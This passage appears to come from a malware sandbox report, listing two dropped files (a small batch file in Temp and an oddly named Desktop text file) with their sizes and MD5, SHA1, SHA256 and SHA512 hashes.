                                                                                                                                                                                                                                                                                        5d6642ca13fe3951926d03f64ad56c360b73aa83c118b902254de9838198fed774604b977990523de555e9183fed716c4cd0edea65dcfe0c75962c0333c4849d

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\A420.tmp\A420.tmp\A421.bat

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        158B

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        517cae8cc74a0ef3cff3ca7f7dc1aa34

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        af1538a03dfa1678ab2117c715682527e22f2450

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        a99b20d186ad773ebac7925995120c0d0dee09865b4278dc2017125fefcf8194

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        8180b499fdba191143306c9e296cd6f6e54068e2717c27072d2f09aa3744d763eb68c88b3377ff6139cecd526f609454da0223f2946a0452bc6e8868ec8cd573

                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Desktop\69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 5.txt

                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                        128B

                                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                                        a6ef45b0aa8443dfea5daaa1bac6a671

                                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                                        b27edc165fd8c892af4442698e623d14dfa87899

                                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                                        6ba4272a0155f90dc9ffb4777d0e6d167372dfba847992ba77b6ebfb7d234ac2

                                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                                        13762ea017e67b1a5d42684ad149bc7aa32c0dad80bd287868ba401d44bfbe5c13ec1ee7d0ffcbcd88abfebe38bf1e8f9a5142297d5860ddbd7466d619a7b1de